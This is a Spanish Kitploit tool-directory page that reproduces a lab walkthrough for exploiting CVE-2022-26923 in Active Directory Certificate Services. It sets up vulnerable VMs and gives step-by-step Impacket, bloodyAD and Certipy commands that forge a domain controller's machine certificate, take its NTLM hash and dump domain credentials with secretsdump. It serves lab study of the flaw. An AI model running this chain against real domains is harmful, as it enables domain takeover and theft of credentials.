Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-26923-rayng — Explotación para CVE-2022-26923 | Kitploit
Herramientas/GitHubGitHub/rayngnpc/cve-2022-26923-rayng
Descifrado de ContraseñasEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAutenticaciónAprendizaje y EducaciónLabs y Práctica
GitHubrayngnpc/cve-2022-26923-rayng

CVE-2022-26923-rayng

Explotación para CVE-2022-26923

Ver Repositorio
4hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Explotando CVE-2022-26923: Escalada de Privilegios mediante Autoridad de Certificación

Resumen

CVE-2022-26923 es una vulnerabilidad en los Servicios de Certificados de Active Directory (AD CS) que permite a un atacante escalar privilegios abusando de la autenticación basada en certificados. Esta guía describe los pasos para explotar esta vulnerabilidad utilizando Impacket y Certipy.


Tabla de Credenciales

Máquina VirtualUsuarioContraseña
Windows ServerAdministrator!@windowsadmintest101
Windows Servertestuser$Vulnerable139
Kali-Linux VMvagrantvagrant

Paso 1: Clonar el Repositorio y Configurar las Máquinas Virtuales

Primero, clona el repositorio que contiene los archivos necesarios:

root@kitploit:~
git clone https://github.com/rayngnpc/CVE-2022-26923-rayng.git
cd CVE-2022-26923-rayng

Configurar Máquinas Virtuales

El repositorio contiene dos carpetas, cada una con un Vagrantfile para aprovisionar máquinas virtuales. Debes instalar Vagrant en tu máquina anfitriona antes de continuar.

Instalar Vagrant

Para Windows

Descarga e instala Vagrant desde aquí. O instálalo usando PowerShell:

root@kitploit:~
choco install vagrant
Para Linux
root@kitploit:~
sudo apt update && sudo apt install vagrant -y

Máquina Virtual Windows Server 2022

Navega al directorio WindowsServer2022:

root@kitploit:~
cd WindowsServer2022
vagrant up

Esto descargará y configurará la máquina virtual Windows Server 2022 en VirtualBox.

Máquina Virtual Kali Linux

Navega al directorio Kali-LinuxVM:

root@kitploit:~
cd Kali-LinuxVM
vagrant up

Paso 2: Configurar la Red Virtual

Dado que el exploit requiere una red NAT, configura VirtualBox de la siguiente manera:

En Windows

Antes de ejecutar el comando siguiente, asegúrate de que VBoxManage esté agregado a tus variables de entorno. Si no es así, ejecuta el comando usando su ruta completa:

Agregar Red NAT

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

Si VBoxManage no es reconocido, usa:

root@kitploit:~
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

En Linux

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

Asegúrate de revisar ambas máquinas virtuales en VirtualBox y verifica que estén asignadas al adaptador de red NatNetwork - NatNet1.

Puedes crear una red NAT con un nombre diferente, pero debe estar en el rango de IP 10.0.2.0/24.

Paso 3: Modificar el Archivo Hosts

Antes de continuar, asegúrate de que tanto Windows Server 2022 como Kali Linux VM estén encendidas.

Accede a la máquina virtual Kali Linux para iniciar el ataque.

Actualiza tu archivo /etc/hosts para mapear la IP del controlador de dominio:

root@kitploit:~
sudo nano /etc/hosts

Agrega la siguiente entrada:

root@kitploit:~
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local

Guarda y sal.


Paso 4: Configurar el Entorno

Navega al directorio CVE-26923 y activa el entorno virtual de Python:

root@kitploit:~
cd ~/CVE-26923
source ~/CVE-26923/rayng/bin/activate

Paso 5: Agregar un Equipo al Dominio

Usando la utilidad addcomputer de Impacket:

root@kitploit:~
impacket-addcomputer -computer-name 'PCTEST1' -computer-pass 'testuser' -dc-host 10.0.2.121 -domain-netbios pchau.domain.local pchau.domain.local/testuser:'$Vulnerable139'

Paso 6: Asignar PCTEST1 al Controlador de Dominio

Método 1: Usando SSH (si OpenSSH está instalado en el servidor objetivo)

root@kitploit:~
ssh [email protected]
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname
Set-ADComputer PCTEST1 -DnsHostName SERVER2022.pchau.domain.local
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname

Método 2: Sin SSH (usando Impacket y BloodyAD)

Verifica los equipos del dominio:

root@kitploit:~
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121

Navega al directorio bloodyAD y usa bloodyAD.py para agregar PCTEST1 al dominio:

root@kitploit:~
cd ~/CVE-26923/bloodyAD/
python3 bloodyAD.py -d pchau.domain.local -u testuser -p '$Vulnerable139' --host 10.0.2.121 set object PCTEST1$ dNSHostName -v 'SERVER2022.pchau.domain.local'

Verifica que PCTEST1 haya sido asignado al dominio:

root@kitploit:~
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121

Paso 7: Proceso de Explotación

Encontrar Certificados Vulnerables

Usa Certipy para encontrar certificados vulnerables:

root@kitploit:~
certipy find -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser'

Solicitar un Certificado

Solicita un certificado de máquina usando Certipy:

root@kitploit:~
certipy req -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser' -template Machine -ca pchau-SERVER2022-CA

Autenticarse con el Certificado

Autentícate usando el certificado obtenido:

root@kitploit:~
certipy auth -pfx server2022.pfx

Paso 8: Extraer Hashes NTLM

Después de ejecutar el comando certipy auth, se mostrarán dos hashes. El hash del lado derecho se usará para la autenticación NTLM.

Ejemplo de salida de hash:

root@kitploit:~
aad3b435b51404eeaad3b435b51404ee:69079fd4946af567d682d61e121f29e7

Usa el hash NTLM extraído para volcar credenciales:

root@kitploit:~
impacket-secretsdump '[email protected]' -hashes :69079fd4946af567d682d61e121f29e7

Esto completa la cadena de ataque completa para explotar CVE-2022-26923.

Descargar herramienta